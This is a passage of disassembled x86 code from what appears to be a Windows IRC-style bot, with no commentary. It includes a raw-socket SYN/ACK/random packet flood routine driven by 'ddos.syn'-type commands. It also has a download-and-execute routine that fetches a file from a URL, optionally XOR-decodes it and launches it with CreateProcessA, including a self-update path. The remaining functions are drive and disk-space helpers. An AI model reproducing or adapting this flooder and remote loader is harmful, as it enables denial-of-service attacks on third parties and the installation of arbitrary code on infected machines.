loc_402727: ; CODE XREF: sub_4025FE+124�j
mov esi, [ebp+var_8]
and byte ptr [ebx+28h], 0
and byte ptr [ebx+29h], 0
and byte ptr [ebx+2Ah], 0
and byte ptr [ebx+2Bh], 0
push esi
mov [ebx+4], ecx
mov [ebx+8], eax
mov word ptr [ebx+0Eh], 10h
mov [ebx+14h], edi
mov [ebx+10h], edi
mov [ebx+20h], edi
mov [ebx+24h], edi
mov word ptr [ebx+0Ch], 1
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402773
push ebx
push [ebp+var_4]
push 42Dh
push esi
call dword_43A484 ; SendMessageA
loc_402773: ; CODE XREF: sub_4025FE+163�j
push esi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402790
lea eax, [ebp+var_6C]
push eax
push 60h
push 441h
push esi
call dword_43A484 ; SendMessageA
loc_402790: ; CODE XREF: sub_4025FE+17E�j
push esi
mov [ebp+var_68], edi
mov [ebp+var_44], edi
mov [ebp+var_40], edi
mov [ebp+var_3C], edi
mov [ebp+var_38], 1
mov [ebp+var_34], 5
mov [ebp+var_6C], 1046Ah
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4027CE
lea eax, [ebp+var_6C]
push eax
push 60h
push 440h
push esi
call dword_43A484 ; SendMessageA
loc_4027CE: ; CODE XREF: sub_4025FE+1BC�j
push esi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4027E9
push [ebp+arg_0]
push edi
push 414h
push esi
call dword_43A484 ; SendMessageA
loc_4027E9: ; CODE XREF: sub_4025FE+1D9�j
push esi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402802
push edi
push edi
push 43Eh
push esi
call dword_43A484 ; SendMessageA
loc_402802: ; CODE XREF: sub_4025FE+1F4�j
push esi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_40281F
push [ebp+var_C]
push [ebp+var_4]
push 42Dh
push esi
call dword_43A484 ; SendMessageA
loc_40281F: ; CODE XREF: sub_4025FE+20D�j
push [ebp+var_C]
call sub_416D07
push ebx
call sub_416D07
pop ecx
pop ecx
push esi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402848
push edi
push edi
push 40Bh
push esi
call dword_43A484 ; SendMessageA
loc_402848: ; CODE XREF: sub_4025FE+66�j
; sub_4025FE+D9�j ...
push [ebp+var_8]
call dword_43A3B4 ; DestroyWindow
mov eax, edi
loc_402853: ; CODE XREF: sub_4025FE+3C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4025FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_402858 proc near ; CODE XREF: sub_402B47+40�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = dword ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_A8], bl
lea edi, [ebp+64h+var_A7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call dword_43A3CC ; WSAStartup
test eax, eax
jz short loc_402894
xor eax, eax
jmp loc_402B40
; ---------------------------------------------------------------------------
loc_402894: ; CODE XREF: sub_402858+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_43A334 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_18], eax
jz loc_402B38
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push ebx
push eax
mov [ebp+64h+var_44], edi
call dword_43A3D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_402B2F
push esi
push [ebp+64h+arg_C]
mov [ebp+64h+var_B8], 2
call dword_43A514 ; ntohs
mov esi, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_B6], ax
mov [ebp+64h+var_B4], esi
mov [ebp+64h+var_30], 45h
call dword_43A514 ; ntohs
push [ebp+64h+arg_C]
mov [ebp+64h+var_2E], ax
mov [ebp+64h+var_2C], di
mov [ebp+64h+var_2A], bx
mov [ebp+64h+var_28], 80h
mov [ebp+64h+var_27], 6
mov [ebp+64h+var_26], bx
mov [ebp+64h+var_20], esi
call dword_43A514 ; ntohs
mov [ebp+64h+var_12], ax
call sub_416B31
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43A514 ; ntohs
push 12345678h
call dword_43A4EC ; ntohl
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40295B
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 2
jmp short loc_4029AB
; ---------------------------------------------------------------------------
loc_40295B: ; CODE XREF: sub_402858+F8�j
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402975
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 10h
jmp short loc_4029AB
; ---------------------------------------------------------------------------
loc_402975: ; CODE XREF: sub_402858+112�j
mov esi, [ebp+64h+arg_8]
push 0Ch
mov edi, offset aDdos_random ; "ddos.random"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4029AB
call sub_416B31
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_C], edx
call sub_416B31
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_7], dl
loc_4029AB: ; CODE XREF: sub_402858+101�j
; sub_402858+11B�j ...
push 4000h
mov [ebp+64h+var_8], 50h
call dword_43A514 ; ntohs
mov [ebp+64h+var_6], ax
lea eax, [ebp+64h+var_6C]
push eax
mov [ebp+64h+var_2], bx
mov [ebp+64h+var_1C], ebx
call dword_42203C ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
push [ebp+64h+var_68]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_6C]
cdq
push edx
push eax
call sub_417220
add eax, [ebp+64h+var_38]
adc edx, [ebp+64h+var_34]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
jmp short loc_402A1F
; ---------------------------------------------------------------------------
loc_4029F8: ; CODE XREF: sub_402858+2A4�j
add [ebp+64h+var_1C], eax
lea eax, [ebp+64h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+64h+var_34]
cmp eax, [ebp+64h+var_3C]
jg loc_402B2B
jl short loc_402A1F
mov eax, [ebp+64h+var_38]
cmp eax, [ebp+64h+var_40]
jnb loc_402B2B
loc_402A1F: ; CODE XREF: sub_402858+19E�j
; sub_402858+1B9�j
mov [ebp+64h+var_4], bx
call sub_416B31
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43A514 ; ntohs
mov [ebp+64h+var_14], ax
call sub_416B31
call sub_416B31
push eax
call dword_43A514 ; ntohs
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call dword_43A4EC ; ntohl
inc [ebp+64h+arg_4]
mov esi, eax
mov eax, [ebp+64h+arg_0]
push 14h
mov [ebp+64h+var_60], eax
mov [ebp+64h+var_24], esi
mov [ebp+64h+var_5C], bl
mov [ebp+64h+var_5B], 6
call dword_43A514 ; ntohs
push 8
pop ecx
mov [ebp+64h+var_64], esi
mov [ebp+64h+var_5A], ax
push 5
lea esi, [ebp+64h+var_64]
lea edi, [ebp+64h+var_A8]
rep movsd
pop ecx
lea eax, [ebp+64h+var_A8]
push 34h
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_88]
push eax
rep movsd
call sub_4088EA
push 5
pop ecx
push 5
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
mov [ebp+64h+var_4], ax
pop ecx
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_94]
rep movsd
xor eax, eax
lea edi, [ebp+64h+var_80]
stosd
lea eax, [ebp+64h+var_A8]
push 28h
push eax
call sub_4088EA
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+64h+var_26], ax
lea eax, [ebp+64h+var_B8]
push eax
push ebx
push 28h
lea eax, [ebp+64h+var_A8]
push eax
push [ebp+64h+var_18]
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
call dword_43A38C ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_4029F8
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+64h+var_F8]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax
call sub_416975
lea eax, [ebp+64h+var_F8]
push eax
call sub_401F0F
add esp, 10h
jmp short loc_402B2E
; ---------------------------------------------------------------------------
loc_402B2B: ; CODE XREF: sub_402858+1B3�j
; sub_402858+1C1�j
mov ebx, [ebp+64h+var_1C]
loc_402B2E: ; CODE XREF: sub_402858+2D1�j
pop esi
loc_402B2F: ; CODE XREF: sub_402858+73�j
push [ebp+64h+var_18]
call dword_43A4D0 ; closesocket
loc_402B38: ; CODE XREF: sub_402858+57�j
call dword_43A4DC ; WSACleanup
mov eax, ebx
loc_402B40: ; CODE XREF: sub_402858+37�j
pop edi
pop ebx
add ebp, 64h
leave
retn
sub_402858 endp
; =============== S U B R O U T I N E =======================================
sub_402B47 proc near ; CODE XREF: sub_402BA3+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40877E
push [esp+10h+arg_4]
mov esi, eax
call sub_416D02
push [esp+14h+arg_C]
mov ebx, eax
call sub_416D02
mov edi, eax
call sub_416B31
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_402858
add esp, 20h
test eax, eax
jnz short loc_402B94
inc eax
loc_402B94: ; CODE XREF: sub_402B47+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_402B47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA3 proc near ; DATA XREF: sub_409848+2DFF�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call dword_422004 ; GetTickCount
push eax
call sub_416B24
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_402B47
push eax
lea eax, [ebp+var_494]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax
call sub_416975
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_402C33
push esi
push [ebp+var_C]
lea eax, [ebp+var_494]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_405D62
add esp, 14h
loc_402C33: ; CODE XREF: sub_402BA3+6E�j
lea eax, [ebp+var_494]
push eax
call sub_401F0F
push [ebp+var_290]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_402BA3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402C54 proc near ; CODE XREF: sub_402C71+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_402C70
loc_402C60: ; CODE XREF: sub_402C54+1A�j
mov dl, byte_42FCD4
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_402C60
locret_402C70: ; CODE XREF: sub_402C54+A�j
retn
sub_402C54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C71 proc near ; DATA XREF: sub_409848+2BEF�o
; sub_409848+33E8�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_43A508
call dword_43A3C4 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_403120
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call dword_422034 ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_402D38
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_402D1B
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
add esp, 14h
loc_402D1B: ; CODE XREF: sub_402C71+88�j
lea eax, [ebp+var_610]
push eax
call sub_401F0F
push [ebp+var_8C]
call sub_4139F6
pop ecx
jmp loc_403181
; ---------------------------------------------------------------------------
loc_402D38: ; CODE XREF: sub_402C71+68�j
xor esi, esi
call dword_422004 ; GetTickCount
mov [ebp+var_4], eax
loc_402D43: ; CODE XREF: sub_402C71+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_43A470 ; InternetReadFile
cmp [ebp+var_78], ebx
jz short loc_402D81
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_402C54
pop ecx
pop ecx
loc_402D81: ; CODE XREF: sub_402C71+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call dword_422030 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_402DA6
cmp esi, [ebp+var_80]
ja short loc_402DEB
loc_402DA6: ; CODE XREF: sub_402C71+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_43B060
cmp [ebp+var_88], 1
jz short loc_402DD4
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_402DD9
; ---------------------------------------------------------------------------
loc_402DD4: ; CODE XREF: sub_402C71+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_402DD9: ; CODE XREF: sub_402C71+161�j
push eax
call sub_416975
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_402D43
loc_402DEB: ; CODE XREF: sub_402C71+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_402E40
cmp esi, [ebp+var_80]
jz short loc_402E40
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_416975
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
lea eax, [ebp+var_610]
push eax
call sub_401F0F
add esp, 28h
loc_402E40: ; CODE XREF: sub_402C71+184�j
; sub_402C71+189�j
call dword_422004 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call dword_42202C ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_40316D
cmp [ebp+var_88], 1
jz loc_403031
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402E8C
fadd dbl_422B60
loc_402E8C: ; CODE XREF: sub_402C71+213�j
test esi, esi
fmul dbl_422B58
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402EAE
fadd dbl_422B60
loc_402EAE: ; CODE XREF: sub_402C71+235�j
fmul dbl_422B58
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_416975
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402EF2
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
add esp, 14h
loc_402EF2: ; CODE XREF: sub_402C71+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401F0F
cmp [ebp+var_84], 1
pop ecx
jnz loc_40316D
cmp [ebp+var_74], ebx
jnz short loc_402F5C
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_416975
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
lea eax, [ebp+var_610]
push eax
call sub_401F0F
add esp, 28h
loc_402F5C: ; CODE XREF: sub_402C71+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_422B00+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_402F95: ; CODE XREF: sub_402C71+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_402F95
lea edi, [ebp+var_810]
dec edi
loc_402FAF: ; CODE XREF: sub_402C71+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402FAF
mov esi, offset asc_422B00 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_402FC6: ; CODE XREF: sub_402C71+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402FC6
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_402FD6: ; CODE XREF: sub_402C71+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_402FD6
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call dword_422044 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_403027
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_403132
; ---------------------------------------------------------------------------
loc_403027: ; CODE XREF: sub_402C71+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_403132
; ---------------------------------------------------------------------------
loc_403031: ; CODE XREF: sub_402C71+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_403041
fadd dbl_422B60
loc_403041: ; CODE XREF: sub_402C71+3C8�j
test esi, esi
fmul dbl_422B58
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_403063
fadd dbl_422B60
loc_403063: ; CODE XREF: sub_402C71+3EA�j
fmul dbl_422B58
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_416975
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_4030A7
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
add esp, 14h
loc_4030A7: ; CODE XREF: sub_402C71+414�j
lea eax, [ebp+var_610]
push eax
call sub_401F0F
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_422B00+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call dword_422044 ; CreateProcessA
cmp eax, esi
jnz short loc_403112
call dword_43A4DC ; WSACleanup
call sub_407576
push ebx
call dword_422040 ; ExitProcess
loc_403112: ; CODE XREF: sub_402C71+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_40312C
; ---------------------------------------------------------------------------
loc_403120: ; CODE XREF: sub_402C71+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_40312C: ; CODE XREF: sub_402C71+4AD�j
lea eax, [ebp+var_610]
loc_403132: ; CODE XREF: sub_402C71+3B1�j
; sub_402C71+3BB�j
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_403160
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_405D62
add esp, 14h
loc_403160: ; CODE XREF: sub_402C71+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401F0F
pop ecx
loc_40316D: ; CODE XREF: sub_402C71+1F8�j
; sub_402C71+295�j
push [ebp+var_C]
call dword_43A41C ; InternetCloseHandle
push [ebp+var_8C]
call sub_4139F6
loc_403181: ; CODE XREF: sub_402C71+C2�j
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_402C71 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40318A proc near ; CODE XREF: sub_409848+5685�p
; sub_409848+57D8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4172A4
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40318A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4031A4 proc near ; CODE XREF: sub_4032A8+66�p
; sub_4032A8+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_438A9C
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_4031C4: ; CODE XREF: sub_4031A4+50�j
; sub_4031A4+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4172F0
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_4031FC
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_4031C4
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_4031C4
; ---------------------------------------------------------------------------
loc_4031FC: ; CODE XREF: sub_4031A4+40�j
mov eax, esi
pop ebx
jmp short loc_403206
; ---------------------------------------------------------------------------
loc_403201: ; CODE XREF: sub_4031A4+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_403206: ; CODE XREF: sub_4031A4+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_403201
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_4031A4 endp
; =============== S U B R O U T I N E =======================================
sub_403217 proc near ; CODE XREF: sub_4033C3+3E�p
; sub_4033C3+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43A33C ; GetDriveTypeA
sub eax, 0
jz short loc_40325A
dec eax
jz short loc_403254
dec eax
dec eax
jz short loc_40324E
dec eax
jz short loc_403248
dec eax
jz short loc_403242
dec eax
jz short loc_40323C
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_40323C: ; CODE XREF: sub_403217+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_403242: ; CODE XREF: sub_403217+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_403248: ; CODE XREF: sub_403217+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40324E: ; CODE XREF: sub_403217+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_403254: ; CODE XREF: sub_403217+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40325A: ; CODE XREF: sub_403217+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_403217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_4032A8+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43A3B8
test eax, eax
jz short loc_403295
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_403295: ; CODE XREF: sub_403260+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032A8 proc near ; CODE XREF: sub_4033C3+17�p
; sub_412B6A+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_403260
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
